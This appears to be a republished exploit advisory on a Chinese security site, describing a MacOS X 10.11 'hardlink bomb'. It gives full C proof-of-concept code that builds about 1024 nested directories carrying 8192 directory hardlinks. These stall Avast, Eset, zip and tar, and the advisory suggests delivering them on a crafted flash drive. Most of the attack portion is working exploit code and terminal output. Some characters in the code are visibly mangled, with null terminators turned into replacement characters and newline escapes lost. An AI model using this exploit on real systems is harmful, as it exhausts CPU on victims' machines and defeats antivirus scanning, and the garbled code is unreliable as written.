首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MacOS X 10.11 Hardlink Resource Exhaustion
来源:http://cxsecurity.com/ 作者:Arciemowicz 发布时间:2015-10-27  
/*

MacOS X 10.11 hardlink bomb cause resource exhaustion (Avast PoC)
Credit: Maksymilian Arciemowicz ( CXSECURITY )
Website: 
http://cxsecurity.com/
http://cert.cx/


Affected software:
- Commands such as: zip, tar, find
- AntiVirus: Avast, Eset32

Let's back to an old bug, which Apple does not patch until today.

https://cxsecurity.com/issue/WLB-2013110059
----------------------------------------------
mac-cxs-XK:pochd XK$ cat test.c
#include <stdio.h>
#include <unistd.h>

void usage(const char* program)
{
const char* message = " [src_dir] [target_dir]";
fprintf(stderr, "%s%sn", program, message);
}

int main(int argc, char* argv[]) {
if (argc!=3) {
usage(argv[0]);
return 1;
}

int ret = link(argv[1],argv[2]);

fprintf(stderr,"link(3) return= %dn", ret);

return ret;
}

mac-cxs-XK:pochd XK$ gcc -o test test.c
mac-cxs-XK:pochd XK$ ls
test	test.c
mac-cxs-XK:pochd XK$ mkdir DIR1
mac-cxs-XK:pochd XK$ ./test DIR1 Hardlink1
link(3) return= -1
mac-cxs-XK:pochd XK$ mkdir DIR1/DIR2
mac-cxs-XK:pochd XK$ ./test DIR1/DIR2 Hardlink2
link(3) return= 0
mac-cxs-XK:pochd XK$ cd DIR1
mac-cxs-XK:DIR1 XK$ mkdir DIR2/DIR3
mac-cxs-XK:DIR1 XK$ ../test DIR2/DIR3 Hardlink3
link(3) return= 0
mac-cxs-XK:DIR1 XK$ cd DIR2
mac-cxs-XK:DIR2 XK$ mkdir DIR3/DIR4
mac-cxs-XK:DIR2 XK$ ../../test DIR3/DIR4 Hardlink4
link(3) return= -1
----------------------------------------------

As we see is possible to create hardlink with some limitations. In presented PoC just two hardlinks were created what show that this possibility still exists and is in opposition to wikipedia's facts

https://en.wikipedia.org/wiki/Hard_link

---
UNIX System V allowed them, but only the superuser had permission to make such links.[5] Mac OS X v10.5 (Leopard) and newer use hard links on directories for the Time Machine backup mechanism only. Symbolic links and NTFS junction points are generally used instead for this purpose.
---

Maybe �Time Machine� uses the same function 'link()' which Apple can't patch? I don't know but two hardlinks aren't threat for stability dissimilarly to 8192. The following program allows you to create N directories (default=1024) with 8 hardlinks on each level e.g. 1024 directories and 8192 hardlinks.

For many programs special crafted file system, can be very difficult to handle. Two examples of groups of tools, which have this weakness: AV Tools and software for archiving.

An example of a vector of attack for the AV tool is an external flash drive. If attacker create special crafted flash drive and victim will decide to scan this drive by using Avast, scanning will not end in normal time. After twenty hours of external media scanning 0% of progress so I decided to discontinue further scanning. Nevertheless Avast fell into the CPU exhaustion, which could not be stopped. On subsequent attempts of any scan Avast returned an error 7012.


Archiving Tools zip(1), tar(1) also have problem with compressing 1024 directories and 8192 hardlinks.

# zip -R packme.zip B
Scanning files ................

and no end in sight.

after six hours I decided to stop further compressing. Other tools for data backup may not deal with such file system.
BTW: don't try use ln(1) command. &#9786; To create hardlink on MacOSX you need use link(3) function used in the following PoC


====== References ===================================
https://cxsecurity.com/issue/WLB-2015100149
https://cxsecurity.com/issue/WLB-2014040027
https://cxsecurity.com/cveshow/CVE-2014-4433/
https://cxsecurity.com/cveshow/CVE-2014-4434/
https://cxsecurity.com/issue/WLB-2013110059
https://cxsecurity.com/cveshow/CVE-2013-6799/
https://cxsecurity.com/issue/WLB-2010040284
https://cxsecurity.com/cveshow/CVE-2010-0105/
https://cxsecurity.com/issue/WLB-2005090063
http://en.wikipedia.org/wiki/Hard_link


====== Thanks ===================================
Kacper and Smash_ from DEVILTEAM for technical support. 


====== Credit ===================================
Maksymilian Arciemowicz from cxsecurity.com

http://cxsecurity.com/
http://cert.cx/
http://cifrex.org/


*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <err.h>
#include <errno.h>
#include <locale.h>

int mkpath(char *path, mode_t mode, mode_t dir_mode){

    struct stat sb;
    char *slash;
    int done,rv;

    done=0;
    slash=path;

    for(;;){
        slash += strspn(slash,"/");
        slash += strcspn(slash,"/");

        done = (*slash=='&#65533;');
        *slash = '&#65533;';	

        rv = mkdir(path, done ? mode : dir_mode);

        if(rv < 0){
            int sverrno;

            sverrno = errno;

            if(stat(path,&sb)<0){
                errno=sverrno;
                warn("%s",path);
                return -1;
            }

            if(!S_ISDIR(sb.st_mode)){
                errno = ENOTDIR;
                warn("%s",path);
            return -1;
            }
        } else if (done){
            if((chmod(path,mode)== -1)) {
                warn("%s",path);
                return -1;
            }
        }

        if(done){
            break;
        }

        *slash = '/';
    }

    return 0;
}

int main(int argc, char *argv[]){

    if(argc!=2){
        printf("Use it with (int)arg[1]. E.g. 8192n");
        return 1;
    }

    int wbita=atoi(argv[1]);

    const char symn1[]="X1&#65533;", symn2[]="X2&#65533;", symn3[]="X3&#65533;", symn4[]="X4&#65533;";
    const char symn5[]="X5&#65533;", symn6[]="X6&#65533;", symn7[]="X7&#65533;", symn8[]="X8&#65533;";
    char buff[]="B&#65533;", cd[]="..&#65533;";
    char sym[]="B/B&#65533;";
    FILE *fp;

    int level=0;
    mode_t mode = ((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0));
    mode_t dir_mode = mode | S_IWUSR |S_IXUSR;

    mkpath(buff,mode,dir_mode);

    // Step 0
    while(1) 
        if(0!=chdir(buff)){
            printf("Phase 0 donen");
            break;
        }
        else printf("cd to already created dir on level: %in",level++);
    
    // Step 1
    for(int ax=level; ax<wbita; ax++){
        mkpath(buff,mode,dir_mode);

        printf("Directory created. Progress (%i/%i)n",(ax+1), wbita);

        if(0!=chdir(buff)){
            printf("Error. chdir() failed.");
            break;
        }
    }

    // Step 2
    mkpath(buff,mode,dir_mode);
    chdir(buff);
    mkpath(buff,mode,dir_mode);
    chdir(cd);

    // Step 3
    for(int ax=level; ax<wbita; ax++){
        printf("=======================ncd .. and HLs. Progress: (%i/%i) [be patient. latency may occur]n",(ax+1),wbita);
        printf("Link1(%s,%s)=%i;n",sym,symn1,link(sym,symn1));
        printf("Link2(%s,%s)=%i;n",sym,symn2,link(sym,symn2));
        printf("Link3(%s,%s)=%i;n",sym,symn3,link(sym,symn3));
        printf("Link4(%s,%s)=%i;n",sym,symn4,link(sym,symn4));
        printf("Link5(%s,%s)=%i;n",sym,symn5,link(sym,symn5));
        printf("Link6(%s,%s)=%i;n",sym,symn6,link(sym,symn6));
        printf("Link7(%s,%s)=%i;n",sym,symn7,link(sym,symn7));
        printf("Link8(%s,%s)=%i;n",sym,symn8,link(sym,symn8));

        if(0!=chdir(cd)){
            printf("Error. chdir failed!");
            break;
        }

    }
    return 0;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MacOS X 10.11 FTS Buffer Overf
·Th3 MMA mma.php Backdoor Arbit
·Winamp Bento Browser Remote Co
·Mac OS X 10.9.5 / 10.10.5 rsh/
·Microsoft Compiled HTML Help R
·Samsung SecEmailUI Script Inje
·HTML Compiler Remote Code Exec
·Sam Spade 1.14 - Scan From IP
·SiteWIX SQL Injection
·NetUSB Kernel Stack Buffer Ove
·HandyPassword 4.9.3 SEH Overwr
·AIX 7.1 - lquerylv Local Privi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved